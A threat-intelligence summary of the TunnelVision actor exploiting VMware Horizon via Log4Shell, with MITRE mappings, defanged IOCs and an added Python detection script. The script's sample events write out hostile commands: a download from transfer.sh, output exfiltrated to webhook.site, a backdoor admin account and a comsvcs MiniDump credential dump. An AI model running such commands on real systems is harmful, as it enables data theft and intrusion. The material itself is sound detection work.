Log4j2 In The Wild | Iranian-Aligned Threat Actor “TunnelVision” Actively Exploiting VMware Horizon

SentinelLabs tracks TunnelVision, an Iranian-aligned threat actor cluster exploiting VMware Horizon and Log4j vulnerabilities to deploy backdoors, harvest credentials, and move laterally in the Middle East and the US. The operation heavily relies on tunneling tools (FRPC, Plink) and shows ties to broader Phosphorus activity, including ransomware deployment. #TunnelVision #Phosphorus #CharmingKitten #NemesisKitten #Log4Shell #VMwareHorizon #FRPC #Plink

Key points

  • TunnelVision is an Iranian-aligned threat actor cluster observed in the Middle East and the US.
  • The group heavily uses tunneling tools (FRPC, Plink) to wrap and hide traffic as part of their operations.
  • The group exploits 1-day vulnerabilities (FortiOS CVE-2018-13379, ProxyShell, Log4Shell) and currently focuses on VMware Horizon exploitation.
  • VMware Horizon vulnerability exploitation spawns malicious processes from Tomcat to run PowerShell, deploy backdoors, harvest credentials, and enable lateral movement.
  • PowerShell-based actions include webhooks for outputs and attempts to download ngrok, with several legitimate services used in operations (e.g., transfer.sh, webhook.site).
  • Two reverse shells and multiple backdoors (including a service named InteropServices) described in the report illustrate ongoing, multi-stage payloads and C2 communication.
  • Attribution discussions connect TunnelVision to Phosphorus and related actors (Charming Kitten, Nemesis Kitten), though the available data does not conclusively establish a single identity.

MITRE Techniques

  • [T1059.001] PowerShell – The actors run PowerShell commands via the Tomcat process to execute payloads and later use PS reverse shells. ‘…run PowerShell commands directly, and then runs further commands by means of PS reverse shells, executed via the Tomcat process.’
  • [T1105] Ingress Tool Transfer – The actor downloads tool payloads (e.g., ngrok) to compromised Horizon servers during the PowerShell activity. ‘attempted to download ngrok to a compromised VMware Horizon server’
  • [T1572] Protocol Tunneling – The group uses tunneling tools (FRPC, Plink) to tunnel traffic, notably RDP traffic. ‘Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.’
  • [T1136] Create Account – Backdoor creation involves creating a new user and privileging it as an administrator. ‘Creation of a backdoor user and adding it to the administrators group.’
  • [T1003] Credential Dumping – Credential harvesting with Procdump, SAM hive dumps, and MiniDump. ‘Credential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.’
  • [T1046] Network Service Scanning – Recon activity includes an internal subnet RDP scan using a public port scanner. ‘Internal subnet RDP scan using a publicly available port scan script.’
  • [T1071.001] Web Protocols – C2 beacons and exfiltration via web services/webhooks. ‘beaconing to the same C2 server’ and ‘sending outputs back utilizing a webhook.’
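A defender-side triage of the behaviours listed above, as an added example that is not code from the SentinelLabs report: it turns the technique descriptions into simple rules and runs them over constructed Sysmon-style process-creation events. It assumes the Horizon Tomcat service binary is named ws_TomcatService.exe, which the page itself does not state.

```python
import re

# Assumed Horizon Tomcat service binary name (not stated on the page); adjust to your telemetry.
TOMCAT_RE = re.compile(r"\\ws_TomcatService\.exe$", re.I)
POWERSHELL_RE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
# Tool download sources named in the report (transfer.sh, ngrok) and the output channel (webhook.site).
INGRESS_RE = re.compile(r"transfer\.sh|ngrok", re.I)
WEBHOOK_RE = re.compile(r"webhook\.site", re.I)
# Backdoor account creation / administrators group add, and the dumping primitives the report lists.
ACCOUNT_RE = re.compile(r"net1?\s+(user\s+\S+\s+\S+|localgroup\s+administrators\s+\S+)\s+/add", re.I)
CREDDUMP_RE = re.compile(r"procdump|reg\s+save\s+hklm\\sam|comsvcs\.dll,\s*MiniDump", re.I)

RULES = [  # (MITRE technique from the report, predicate over one process-creation event)
    ("T1059.001", lambda e: TOMCAT_RE.search(e["parent"]) and POWERSHELL_RE.search(e["image"])),
    ("T1105", lambda e: INGRESS_RE.search(e["cmdline"])),
    ("T1071.001", lambda e: WEBHOOK_RE.search(e["cmdline"])),
    ("T1136", lambda e: ACCOUNT_RE.search(e["cmdline"])),
    ("T1003", lambda e: CREDDUMP_RE.search(e["cmdline"])),
]

def classify(event):
    """Return the technique IDs whose rule matches one process-creation event, in RULES order."""
    return [tid for tid, rule in RULES if rule(event)]

def triage(events):
    """Return (event index, technique IDs) for every event that hits at least one rule."""
    return [(i, t) for i, e in enumerate(events) if (t := classify(e))]

# Constructed sample telemetry (Sysmon Event ID 1 style fields), not real captures.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Invoke-WebRequest https://transfer.sh/EXAMPLE/ngrok.zip -OutFile n.zip; Invoke-RestMethod https://webhook.site/EXAMPLE-ID -Method POST -Body (whoami)"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user backdoor P@ssw0rd /add"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\l.dmp full"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Process"},  # benign interactive use: should not alert
]

if __name__ == "__main__":
    for idx, techniques in triage(SAMPLE_EVENTS):
        print(idx, techniques, SAMPLE_EVENTS[idx]["cmdline"])
```

The first rule is the high-signal one for this campaign: PowerShell as a child of the Horizon Tomcat service has no normal business reason, whereas the command-line rules alone will fire on legitimate administration and need the parent-process context.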

Indicators of Compromise

  • [Domain] C2/payload domains – www[.]microsoft-updateserver[.]cf, www[.]service-management[.]tk
  • [IP] C2 Servers – 51.89.169[.]198, 142.44.251[.]77
  • [IP] Additional C2/Payload/Tunneling Servers – 51.89.135[.]142, 51.89.190[.]128
  • [IP] Payload/Tunneling Server – 51.89.178[.]210
  • [IP] Tunneling Server – 142.44.135[.]86
  • [IP] Additional Payload Server – 182.54.217[.]2
  • [GitHub Account] https://github.com/protections20 – account used to host payloads
  • [Hash] d28e07d2722f771bd31c9ff90b9c64d4a188435a – ZIP file containing a custom backdoor
  • [Hash] 624278ed3019a42131a3a3f6e0e2aac8d8c8b438 – backdoor binary
  • [File] InteropServices.exe – dropped executable registered as a service

Read more: https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/